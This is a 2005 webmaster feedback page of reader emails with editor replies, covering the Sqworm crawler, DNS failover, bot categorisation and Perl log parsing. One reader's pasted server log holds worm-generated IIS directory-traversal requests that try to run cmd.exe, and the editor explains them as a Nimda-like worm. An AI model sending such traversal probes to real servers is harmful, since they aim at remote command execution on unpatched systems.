Message from iman

From: ssss@nodomain
Date: Sat, 1 Jan 2005 11:18:03 +1100 (EST)
Dear Webmaster,
-- Message Follows --
thanks i have a picture sex
-- Message Ends --
From: 80.191.11.17
Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt; FunWebProducts)
Ed: Well I'm glad to hear that one of our readers is happy! Enjoy your
pictures, where ever you got them from ... Just be careful you don't go
blind!
Well he might be happy, but possibly a little confused. Since we don't
offer such pictures at this website ...
Perhaps he intended this message for someone else?
Iman (if that is his name) sent this message from a netblock that is
owned by Alborz Computer Co., in Tehran. His browser also has the
FunWebProducts add-in, which according to most MS pundits is spyware. He
might be getting more than he bargained for ...
(Oh what a tangled web we weave ...)

Sqworm -- what is it?

Date: Tue, 18 Jan 2005 11:39:49 +1100
From: Jeremy Hill
Ed: The following message was sent from the PGTS Postmaster for update
of the robots file.
Dear Webmaster,
---------------
Name:Sqworm
Version:2.9.85
Email:
Comments: 'what is Sqworm? it was poking around my server.'
URL:
---------------
Ed: I replied as follows:
G'day,
Not really sure what Sqworm is. When did you see it?
The last time I saw it was 2004-08-04 00:16:37 GMT
The netblock 66.194.6/24 is currently owned by Websense (delegated by
Time Warner Telecom)
This is all I can discover about them:
OrgName: Websense
OrgID: WEBSEN-1
Address: 10240 Sorrento Valley Rd
City: San Diego
StateProv: CA
PostalCode: 92121
Country: US
NetRange: 66.194.6.0 - 66.194.6.255
CIDR: 66.194.6.0/24
NetName: TWTC-NETBLK-4
NetHandle: NET-66-194-6-0-1
Parent: NET-66-192-0-0-1
NetType: Reassigned
RegDate: 2004-01-26
Updated: 2004-01-26
As far as I can tell, the agent they dispatched is a robot. It didn't
read robots.txt. It is not aggressive and does not appear impolite.
There have been far more hits to my site from people searching for
information about Sqworm, than there has been from Sqworm.
I find nothing suspicious about this organisation or their robot (except
the name, which is a bit peculiar)
Cheers,
Gerry Patterson
For more information see: below.

Re: Sqworm -- what is it?

From: Jeremy Hill
Date: Tue, 18 Jan 2005 04:13:35 GMT
Ed: Jeremy replied as follows:
Gerry,
I am new to web hosting. I set up an Abyss server on my pc 3 days ago,
and am just learning to look over my logs. Here is an excerpt from my
log file when Sqworm showed up. Directly after that hit I had some
unidentified hits poking around looking for scripts and executables.
This is somewhat disturbing to me.
-------------
66.194.6.4 - - [16/Jan/2005:08:37:31 -0600] "GET / HTTP/1.0" 200 9961 "" "Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)"
68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:06 -0600] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:07 -0600] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 223 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:08 -0600] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
68.44.229.242 - - [16/Jan/2005:09:45:09 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 225 "" ""
-----------
I don't know if the 2 IPs are related. I traced the Sqworm IP (using the
'Tracert' tool at www.DNSstuff.com) to a record for "Office of the
Future", apparently last registered in 1992. The IP goes to a UNIX
server {core-02-so-0-0-0-0.phnx.twtelecom.net.}, where it appears there
is a firewall blocking the 'Tracert' tool.
The other IP goes to a Microsoft server on Comcast
{pcp0010510861pcs.limstn01.de.comcast.net.}
As I said before I don't know if these two entries are related, but they
appear in my log exactly as recorded above.
Hopefully this is useful information.
Thanks,
Jeremy Hill
Ed: Jeremy,
It is unlikely that these entries are related.
The hits from 68.44.229.242 are from a worm which infects only IIS
servers. I believe it may be a variant of nimbda.
For more information about the worm see below.
Sqworm, despite the name, is actually a robot. On my site it behaves like
a robot.
It appears that someone else sent some feedback about sqworm here.
Unfortunately, at the time I was neglecting my website. So ... my
apologies to Martha. I have since done some research on Sqworm and
investigated Websense.
It appears that the robot Sqworm, is rigididge (that's Australian for
ok). The netblock is owned by Websense as previously noted. Websense are
a medium to large US corporation who sell Webfiltering software for
proxy servers. They claim to be able to categorise websites. This robot
must be part of their categorisation. They probably use it to build
their website database.
The name "worm" has come into considerable disrepute. And this no doubt
accounts for the general sense of unease that surrounds the Sqworm
robot. It is nevertheless, unfounded. Sqworm is only guilty of being
christened with what, at best, could be described as "an unfortunate
choice of name".
Also I believe that Websense could do a better job of explaining what
their robot does and how their categories work. The whole enterprise
seems too secretive.
If anyone knows different, please let me know.
There is more information about Sqworm in the PGTS blog.
Nimbda:
The second IP address that was in Jeremy's email was from a real worm.
This netblock is owned by Comcast Cable Communications, Inc. Cherry Hill
NJ, a large US cable company. The nethandle is NET-68-44-0-0-1, CIDR
68.44.0.0/15
Someone is running an IIS server on one of Comcast's addresses and it has
been infected.
This IP address returns 7 positives from the openRBL.
So their Internet experience is likely to be somewhat diminished. They
probably don't know any better.
Blars has listed them ... He's a cruel man. Cruel but fair.

Just Testing

From: Anonymous
Date: Wed, 19 Jan 2005 11:24:26 +1100 (EST)
Ed: I received the following notification from the PGTS postmaster:
Dear Webmaster,
My agent string is: Interwebthingy Exploder 8.0000001 (standards compatible; W3C 4.01; [en-GB])
My IP address is: 217.44.1.8
---------------
Name:unknown
Version:
Comments: This is a fake string I entered because I felt like it. And
because it helps me analysing my own logfiles because I can
filter my own visits.
Owner:
OS:
Ed: I use a combination of agent_string and ip address. That way
webmaster hits do not get counted in any stats.
BTW: Coming soon ... An updated version of the agent_string information
panels that will enable readers to add their own comments.

PGTS website

From: Stephen Hampson
Date: Wed, 19 Jan 2005 13:06:14 +1100
Hi Gerry,
I'm not sure if you are aware, but a lot of the time when I try to reach
your website it is unavailable. The DNS seems to not resolve. I get:
"Ping request could not find host www.pgts.com.au/ Please check the
name and try again." When I try to ping your hostname.
Thanks
Steve
Ed: I thought that this might be a network problem, upstream, since I
have accessed my website many times in the Melbourne metropolitan area,
without any obvious problems. It turned out that this was a network
problem, and the problem was my network!
More below ...

PGTS website (2)

Date: Thu, 20 Jan 2005 13:14:19 +1100
From: Stephen Hampson
Gerry,
I'm not sure what you are looking for with the ping's but I'll forward
them to you?
As I said be before the DNS server on 203.213.17.10 is either not
running or is unreachable.
If you log into that box and run:
Dig @127.0.0.1 www.pgts.com.au
What is the output?
Thanks
Steve
Ed: Unfortunately I did not read Steve's email carefully. I checked my
primary DNS, saw that it was working (of course) ... But he was asking
about my secondary DNS!
He was away the next day, and did not get my email, till Monday ...
Fortunately he persisted ... and in one of those awful (dohhh!) moments,
I realised that my seconday DNS was not running! I had altered some of
the startup scripts and restarted the server when I upgraded to postgres
7.4.5. Deep embarassment here! I started named.
(see Steve's next email here)

Linknzbot

From: "Dave"
Date: Sun, 23 Jan 2005 14:10:31 +1300
> ----- Original Message -----
> From: "PGTS Webmaster" <webmaster@pgts.com.au>
> To: <webmaster@linknz.co.nz>
> Sent: Sunday, January 23, 2005 12:10 PM
> Subject: Link With PGTS.com.au
Hi and thanks for listing my search engine on your web site, I have just
sent in my web spidering robot (linknzbot) to index your web site into
the search engine it reported the following searchable links from your
web site:
links found : 17
http://www.pgts.com.au/
http://www.pgts.com.au/page01.html
http://www.pgts.com.au/page02.html
http://www.pgts.com.au/page03.html
http://www.pgts.com.au/download/
http://www.pgts.com.au/page04.php
http://www.pgts.com.au/pgtsj/
http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0412
http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0211a
http://www.pgts.com.au/pgtsj/0501.html
http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0204
http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0204a
http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0204b
http://www.pgts.com.au/cgi-bin/psql?feedback
http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0309b
http://www.pgts.com.au/cgi-bin/psql?blog
http://www.pgts.com.au/cgi-bin/pgtsj?file=pgtsj0302a
Optimizing tables...
Indexing complete !
People who use the linknz search engine can now find and visit your web
site.
Many regards
Dave Andrews
P.S. you should find a new USER AGENT STRING in your log files for the
linknzbot which is our web spidering robot, written in C++.
Ed: G'day Dave,
Thanks for your feedback.
I started the Robots Collections a couple of years ago, as a sort of
hobby, because I was looking for things to write about, when I started
publishing articles online. It has turned out to be a very popular topic
with webmasters. And for that reason, I am trying to categorise Bots
when I see them. I have now settled on the following categories (not
mutually exclusive).
Aggressive
Hard-hitting
Impolite
Suspicious
The default category is blank, this implies that the Bot is polite,
obeys robots.txt instructions, does not attempt to cloak or disguise
its' behaviour, and is not associated with criminal activities or
spamming (which these days looks increasingly as if it will also be
considered criminal). Over the next couple of months, I will be updating
the collection to reflect these categories.
I almost classified your Bot as Hard-hitting. 366 hits in 12 minutes is
sort of borderline. However, since they were mostly HEADs rather than
GETs, I just made a note in the comments section.
Might I suggest that if you intend to do make your crawl sessions any
longer, you should introduce a delay.
Regards,
Gerry Patterson
SysAdmin PGTS Pty Ltd

PGTS website (3)

Date: Mon, 24 Jan 2005 10:13:57 +1100
From: "Stephen Hampson"
Yeah. no worries. That was what I was trying to tell you. It looks like
windows DNS does not fail over properly. So if it hits the secondary DNS
server (50% chance because it work in a round robin way), then there is
a fair chance it will never try the primary DNS server and will just
fail.
Just tried your site then and it works. It wasn't working about 30 mins
ago due to this issue. I'll let you know if I experience problems again.
Ed: And I am very grateful that Steve persisted ... despite me being so
relentlessly thick-headed!
Of course it helps if named is running on your DNS server!
I hadn't realised that Windows DNS servers worked that way ... Obviously
I am going to have to fix up those startup scripts. And all those other
people with Windows DNS, you may find that my site works more than 50%
of the time now!

"bad file" error in coldarch script

From: Grant September
Date: Mon, 24 Jan 2005 22:31:08 +1100 (EST)
Dear Webmaster,
-- Message Follows --
Hi There, tried to use your coldarch.pl file on NT, but kept on getting
Bad file error, i think this is due to my path have a space in the name
do you have a workaround for this as i have no perl programming skills
Ed: I'm sorry Grant, but I have not allowed for spaces in data_file
names.

New Robot LimeBot

From: Kenn Sippell
Date: Tue, 25 Jan 2005 05:08:31 +1100 (EST)
Dear Webmaster,
-- Message Follows --
I would like you to be aware of the web robot known as LimeBot - written
as part of the free enterprise initiative Cruise Lime. The bot
identifies itself with the User-Agent:
'LimeBot/1.0 (+www.cruiselime.com/LimeBot.php)'.
I would appreciate it if you included it in your databases for the
convenience of those who use your search.
-- Message Ends --
Ed: I replied as follows ...
Kenn,
The agent_strings are added automatically when visitors come to this
site. If you are part of the Cruise Lime Enterprise, then I suggest you
send the Limebot to my site. It will be included within 24 hours. I will
approve the entry when I see it.
The LimeBot was first seen in the PGTS logs at 2005-01-25 11:12 GMT.

Getting file types from log file

From: Khoa Nguyen
Date: Fri, 28 Jan 2005 12:31:08 +1100 (EST)
Dear Webmaster,
-- Message Follows --
Hi, thanks for the info posted on the site. They are useful for better
understanding of the log file.
On the web page, you print out 4 columns: IP, Date, Time, and Target. I
have trouble separating the file name from the file type. Example, for
the Target part, what if I only want to print out the types of file
request (txt, html, ..) instead of the whole file name (data.html)?
What if I only want to count how many hits each file type has, instead
of how many times the file is requested? When searching through the log
file, I could search for the file request, but couldn't search for file
type?
I have something like:
"/\/[\w\d\-\.]+\s/" Please advise. Much appreciate it. Thanks
Ed: Khoa,
Sorry not to answer this sooner.
I have been trying to find time to re-write some of the scripts, and I
was hoping to come up with a script that answers this.
Unfortunately I did not get around to doing it.
I do have a script (which is hooked into the PGTS database ... And the
way I try to determine the type is by examining the file extensions.
Obviously this will be site dependant. However, you could come up with a
general solution which uses standard MIME types.
The script I have is actually rather complex. It examines each IP
address and looks for "Robot" behaviour.
e.g. suppose we have a subroutine called parse log which splits each
line into its' individual components then
($IP,$htime,$cmd,$status,$bytes,$referer,$agent) = parse_log($_);
# this assigns the components
# then we can test for the MIME types
unless ($page){
$page_type = $NULL;
}
elsif ($page =~ /\.jpg$/ || $page =~ /\.gif$/ ){
$page_type = $IMAGE;
}
elsif ($page =~ /\.exe$/ || $page =~ /\.gz$/ || $page =~
/\.msi$/ || $page =~ /\.zip$/){
$page_type = $BIN;
}
elsif ($page =~ /robots.txt$/ ){
$page_type = $ROBOT;
}
elsif ($page =~ /\.txt$/ || $page =~ /-HOWTO$/ ){
$page_type = $TXT;
}
etc ... etc
This is rather cumbersome, but it allows you to tailor the results for
your site (you may have particular standards, you may only use gif, jpg
and png or you may do as I do and put all images in the same folder in
which case you would test the first part of $page to see if it was in
the folder called /image etc etc.
Hope this helps